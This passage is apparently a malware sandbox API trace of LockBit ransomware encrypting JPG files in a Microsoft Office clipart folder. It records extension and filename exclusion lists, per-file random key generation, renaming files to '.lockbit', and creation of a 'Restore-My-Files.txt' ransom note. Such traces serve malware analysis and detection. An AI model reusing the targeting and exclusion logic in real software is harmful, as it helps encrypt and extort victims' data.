returned 0x77d7a8 [0124.171] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.171] free (_Block=0x77d7a8) [0124.171] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.171] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.171] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.171] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe4b400, ftCreationTime.dwHighDateTime=0x1bdbf74, ftLastAccessTime.dwLowDateTime=0x65dd0810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfe4b400, ftLastWriteTime.dwHighDateTime=0x1bdbf74, nFileSizeHigh=0x0, nFileSizeLow=0x5fd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099187.JPG", cAlternateFileName="")) returned 1 [0124.172] lstrcmpiW (lpString1=".", lpString2="J0099187.JPG") returned -1 [0124.172] lstrcmpiW (lpString1="..", lpString2="J0099187.JPG") returned -1 [0124.172] PathFindExtensionW (pszPath="J0099187.JPG") returned=".JPG" [0124.172] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0124.172] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0124.172] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0124.172] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0124.172] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0124.172] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0124.172] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0124.172] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0124.172] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0124.172] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0124.172] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0124.172] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0124.172] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0124.172] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0124.172] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0124.172] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0124.172] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0124.172] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0124.172] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0124.172] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0124.172] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0124.172] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0124.172] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0124.173] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0124.173] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0124.173] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0124.173] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0124.173] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0124.173] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0124.173] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0124.173] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0124.173] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0124.173] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0124.173] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099187.JPG") returned 1 [0124.173] lstrcmpiW (lpString1="ntldr", lpString2="J0099187.JPG") returned 1 [0124.174] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099187.JPG") returned 1 [0124.174] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099187.JPG") returned -1 [0124.174] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099187.JPG") returned -1 [0124.174] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099187.JPG") returned 1 [0124.174] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099187.JPG") returned -1 [0124.174] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.174] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned=".JPG" [0124.174] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0124.174] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0124.174] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0124.174] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0124.174] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0124.174] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0124.174] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0124.174] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0124.174] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0124.174] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0124.174] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0124.174] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0124.174] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0124.174] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0124.174] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0124.174] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0124.174] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0124.174] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0124.174] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0124.174] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0124.175] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0124.175] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0124.175] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0124.175] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0124.175] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0124.175] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0124.175] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0124.175] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0124.175] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG.lockbit") returned 72 [0124.175] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099187.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0124.175] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.175] malloc (_Size=0x40068) returned 0x3e70008 [0124.176] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=24528) returned 1 [0124.176] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.176] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0124.176] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.176] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0124.177] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0124.180] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.180] malloc (_Size=0xa6) returned 0x77d7a8 [0124.180] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.181] free (_Block=0x77d7a8) [0124.181] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.181] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.181] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.181] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65dd0810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x2378, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099188.JPG", cAlternateFileName="")) returned 1 [0124.181] lstrcmpiW (lpString1=".", lpString2="J0099188.JPG") returned -1 [0124.181] lstrcmpiW (lpString1="..", lpString2="J0099188.JPG") returned -1 [0124.181] PathFindExtensionW (pszPath="J0099188.JPG") returned=".JPG" [0124.182] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0124.182] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0124.182] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0124.182] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0124.182] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0124.182] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0124.182] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0124.182] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0124.182] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0124.182] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0124.182] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0124.182] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0124.182] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0124.182] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0124.182] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0124.182] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0124.182] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0124.182] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0124.182] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0124.182] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0124.182] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0124.182] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0124.182] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0124.183] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0124.183] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0124.183] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0124.183] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0124.183] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0124.183] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0124.183] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0124.183] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0124.183] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0124.183] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0124.183] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0124.183] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0124.183] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0124.183] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0124.183] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0124.183] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0124.183] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0124.183] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0124.183] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0124.183] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0124.183] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0124.183] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0124.183] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0124.184] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0124.184] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099188.JPG") returned 1 [0124.184] lstrcmpiW (lpString1="ntldr", lpString2="J0099188.JPG") returned 1 [0124.184] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099188.JPG") returned 1 [0124.184] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099188.JPG") returned -1 [0124.184] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099188.JPG") returned -1 [0124.184] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099188.JPG") returned 1 [0124.184] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099188.JPG") returned -1 [0124.184] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.184] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned=".JPG" [0124.184] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0124.184] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0124.184] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0124.184] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0124.184] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0124.184] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0124.184] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0124.184] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0124.184] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0124.184] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0124.184] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0124.184] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0124.185] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0124.185] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0124.185] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0124.185] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0124.185] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0124.185] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0124.185] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0124.185] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0124.185] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0124.185] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0124.185] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0124.185] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0124.185] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0124.185] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0124.185] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0124.185] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0124.185] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG.lockbit") returned 72 [0124.185] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099188.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0124.186] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.186] malloc (_Size=0x40068) returned 0x3ef0008 [0124.186] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=9080) returned 1 [0124.186] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.186] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0124.187] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.187] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0124.187] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0124.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.192] malloc (_Size=0xa6) returned 0x77d7a8 [0124.192] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.192] free (_Block=0x77d7a8) [0124.192] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.192] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.193] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.193] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65dd0810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x1f8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099189.JPG", cAlternateFileName="")) returned 1 [0124.193] lstrcmpiW (lpString1=".", lpString2="J0099189.JPG") returned -1 [0124.193] lstrcmpiW (lpString1="..", lpString2="J0099189.JPG") returned -1 [0124.193] PathFindExtensionW (pszPath="J0099189.JPG") returned=".JPG" [0124.193] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0124.193] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0124.193] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0124.193] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0124.193] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0124.193] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0124.193] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0124.193] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0124.193] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0124.193] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0124.193] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0124.193] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0124.193] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0124.193] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0124.193] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0124.193] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0124.193] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0124.193] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0124.193] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0124.193] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0124.193] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0124.194] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0124.194] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0124.194] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0124.194] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0124.194] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0124.194] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0124.194] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0124.194] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0124.194] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0124.194] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0124.194] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0124.194] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099189.JPG") returned 1 [0124.195] lstrcmpiW (lpString1="ntldr", lpString2="J0099189.JPG") returned 1 [0124.195] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099189.JPG") returned 1 [0124.195] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099189.JPG") returned -1 [0124.195] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099189.JPG") returned -1 [0124.195] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099189.JPG") returned 1 [0124.195] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099189.JPG") returned -1 [0124.195] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.195] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned=".JPG" [0124.195] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0124.195] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0124.195] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0124.195] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0124.195] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0124.195] lstrcmpiW (lpString1=".db", 